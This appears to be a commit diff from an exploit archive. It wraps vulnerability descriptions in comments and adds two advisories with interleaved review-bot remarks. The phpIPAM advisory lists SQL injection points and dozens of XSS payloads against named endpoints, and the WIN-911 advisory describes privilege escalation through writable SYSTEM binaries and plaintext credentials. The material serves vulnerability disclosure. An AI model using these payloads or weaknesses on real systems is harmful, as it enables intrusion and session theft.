**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
/**************************************************************/
/* */

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2997/info
A potential denial of service vulnerability exists in several TCP stack implementations.
@ -5,6 +6,8 @@ A potential denial of service vulnerability exists in several TCP stack implemen
TCP has a MSS (maximum segment size) option that is used by a TCP client to announce to a peer the maximum amount of TCP data that can be sent per segment. The potential for attacks exists because in many cases only a small minimum value is enforced for the MSS.
By setting the MSS to a low value (such as 1) and making requests for large amounts of data through a TCP service, an attacker could effectively cause a denial of service by causing a large workload on a system.
*/
/*
* (C)Copyright 2001 Darren Reed.

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/39693/info
NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
@ -5,6 +6,7 @@ NovaStor NovaNET is prone to code-execution, denial-of-service, and information-
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
*/
/* novanet-own-lnx.c
*
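Review bot: "NovaNET 11 and 12 are vulnerable to all of these issue" should read "issues".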

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/4495/info
OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information.
@ -5,6 +6,7 @@ OpenBSD ships with a number of cron jobs configured by default. The tasks are fo
The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing.
If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included in the emails.
*/
/*
* (c) 2002 venglin@freebsd.lublin.pl

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/12314/info
Reportedly a local integer overflow vulnerability affects the Darwin Kernel. This issue is due to a failure of the affected to properly handle integer signedness.
An attacker may leverage this issue to cause the affected computer to crash, denying service to legitimate users. It has been speculated that this issue may also be leverage to escalate privileges, although this is unconfirmed.
*/
//---------------------( fm-nacho.c )--------------------------
/*
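Review bot: "due to a failure of the affected to properly handle integer signedness" is missing its noun (the affected kernel), and "may also be leverage to escalate privileges" should read "leveraged"; fix both in the new comment block so the wrapped header reads as complete sentences.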

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/21349/info
Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call.
@ -5,6 +6,8 @@ Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue o
Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed.
Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected.
*/
/*
* Copyright 2006 (c) LMH <lmh@info-pull.com>.

187
platforms/php/webapps/40338.txt Executable file
View file

@ -0,0 +1,187 @@
PHPIPAM 1.2.1 Multiple Vulnerabilities
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: 06 Sep 2016
Tested Version: phpipam-1.2.1 (Latest Version - modified on 2016-02-13)
Vendor: http://phpipam.net/
Product URL: https://sourceforge.net/projects/phpipam/
Date: 20 Mar 2016
About Product:
---------------
phpipam is an open-source web IP address management application (IPAM). Its goal is to provide light, modern and useful IP address management.
It is php-based application with MySQL database backend, using jQuery libraries, ajax and some HTML5/CSS3 features.
Vulnerability Report:
----------------------
SQL Injection Vulnerability (3 Items):
on Tools>Changelog
[sPage] Parameter is vulnerable against SQLi.
Method: GET
Payload:
http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a&sPage=50' [SQLi]
on http://[Site]/phpipam/app/tools/user-menu/user-edit.php
[lang] and [printLimit] Parameters are vulnerable against SQLi.
Payload:
Method : POST
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&mailNotify=No&mailChangelog=No&printLimit=30&lang=9'[SQLi]
OR
Method : POST
http://[Site]/phpipam/app/tools/user-menu/user-edit.php
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&lang=9&mailNotify=No&mailChangelog=No&printLimit=30'[SQLi]
===============================================
XSS Vulnerability (36 Items):
Method: POST
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2"><script>alert(document.cookie);</script>&action=edit
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2&action=edit"><script>alert(document.cookie);</script>
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/scan-agents/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/users/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/tags/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/instructions/preview.php
PostData:
instructions=You+can+write+instructions+under+admin+menu!"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=1&subnetId=5&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&location=IPaddresses
http://[Site]/phpipam/app/admin/devices/edit.php
PostData:
switchId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/device-types/edit.php
PostData:
tid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit&vlanNum="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id=&action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fieldName=&table=ipaddresses
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add&fieldName=&table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/filter.php
PostData:
table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/replace-fields/result.php
PostData:
field=description"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&search=a&csrf_cookie=892d2a900ec7fc1ba9486ec171a36f71&replace=a
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=1&subnetId=6&action=edit&location=IPaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=2&subnetId="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add&location=IPaddresses
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fval=a&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a&direction=hostname%7Casc"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/tools/subnet-masks/popup.php
PostData:
closeClass=hidePopups"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
Method: GET
http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a&sPage=50"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
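Review bot: the header metadata is inconsistent: "Product: 06 Sep 2016" carries a date where the product name belongs (phpIPAM is named only in the title and the "Tested Version" line), while "Date: 20 Mar 2016" appears a few lines later, leaving two dates and no product field. The advisory also has no vendor notification or fixed-version section, so a reader cannot tell whether 1.2.1 is the last affected release; add a status line even if it is "vendor not contacted".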

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/1909/info
ManTrap is a "honeypot" intrusion detection system designed to lure attackers into it for analysis. The honeypot is implemented as a chroot'ed Solaris environment, designed to look and feel real to an attacker who gains access to it.
@ -5,6 +6,7 @@ ManTrap is a "honeypot" intrusion detection system designed to lure attackers in
Chroot (change root) is a unix mechanism that allows an administrator to force a process/process group to run under a subset of the file system, denying access to any other parts of the file system. It is possible for an attacker to guess that they are on a chrooted() ManTrap system by looking at the inode of the root directory (ls -id /). If it is high (usually within the 100000-200000 range), then the root directory is a chrooted() subset of a larger filesystem.
This vulnerability, combined with hidden process disclosure (bugtraq ID 1908) should fairly accurately verify to an attaacker (without root privs) that the host is a ManTrap honeypot, defeating its purpose.
*/
/*
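Review bot: "attaacker" in the last description sentence is a typo for "attacker".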

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,7 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
/* land.c by m3lt, FLC
crashes a win95 box */

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,8 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
#define _BSD_SOURCE

View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/2905/info
// source: http://www.securityfocus.com/bid/2905/info
1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility.
// 1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility.
One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output.
// One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output.
Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur.
// Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur.
/*
Proof of conecpt code by linux^sex
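Review bot: this hunk turns the description lines into `//` line comments while the file's own header immediately below opens a `/*` block, and every other hunk in this commit wraps the description in `/* ... */`; use the block form here (and in the matching `//`-style hunks for BID 20360, 5261 and 44163) for consistency. "Proof of conecpt" in the context line is a typo for "concept".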

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/28554/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/
#include
#include
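Review bot: the two `#include` lines at the end of this hunk carry no header name as rendered; if the file really reads `#include` with nothing after it, it will not compile, and if the `<...>` part was lost in rendering, the file should be re-checked and the header names restored.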

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/20360/info
Symantec AntiVirus is prone to a privilege-escalation vulnerability.
@ -5,6 +6,7 @@ Symantec AntiVirus is prone to a privilege-escalation vulnerability.
Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
*/
////////////////////////////////////
///// Norton Internet Security

View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/20360/info
// source: http://www.securityfocus.com/bid/20360/info
Symantec AntiVirus is prone to a privilege-escalation vulnerability.
// Symantec AntiVirus is prone to a privilege-escalation vulnerability.
Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
// Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
// This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
/////////////////////////////////////////////
///// Norton Internet Security /////

View file

@ -0,0 +1,91 @@
Title: WIN-911 - Insecure File Permissions EoP
CWE Class: CWE-276: Incorrect Default Permissions
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to escalate their privilege to system administrator
or SYSTEM on vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
PoC 1:
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to modify files within this location.
Besides executables running with administrative privileges there are also various services binaries.
These all run as SYSTEM and might be overwritten to obtain SYSTEM level access:
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Inbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Outbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\viewLinc Bridge.exe
PoC 2:
The web-server is installed as a separate component under:
"C:\Program Files\Specter Instruments\WEB-911 Services"
This directory allows EVERYONE full-control.
Once exploited, this could affect remote users connecting to the web-server.
- 3. Mitigation: -
None.
If you are brave, edit the permissions.
Not sure how this impacts the application.
- 4. Author: -
sh4d0wman
################################################################
Title: WIN-911 - Credential Disclosure
CWE Class: CWE-276: Incorrect Default Permissions | CWE-256: Plaintext Storage of a Password
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to obtain certain usernames and passwords on
vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to read and modify files within this location.
During configuration an .ini file is populated with information.
Some of this information is sensitive.
The following settings will log credentials in plain-text:
FIX Remote Alarm
ArchestrA Direct Connect
viewLinc Direct Connect
WIN911 Pager
E-mail POP and SMTP
- 3. Mitigation: -
None yet.
- 4. Author: -
sh4d0wman
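Review bot: the Mitigation sections ("None. If you are brave, edit the permissions." and "None yet.") give no actionable control even though the findings identify exactly what to change: remove the Everyone modify / full-control entries on the two install directories and the three SYSTEM service binaries listed, and for the credential issue name the .ini file (the report says "an .ini file" without a path) so an administrator can restrict read access to it. Replace "Not sure how this impacts the application" with a plain statement that the effect on the application was not tested. "Date: 05/09/2016" is ambiguous between day-first and month-first order; use an unambiguous form.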

View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/5261/info
// source: http://www.securityfocus.com/bid/5261/info
MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
// MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
/*
mercrexp.c (7/16/2002)

View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/44163/info
// source: http://www.securityfocus.com/bid/44163/info
1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code.
// 1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code.
An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
// An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected.
// LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected.
/*
#One CLICK DVD Converter 2.1.7.1 DLL Hijacking Exploit (vsoscaler.dll ; swscale.dll ; dvd43.dll )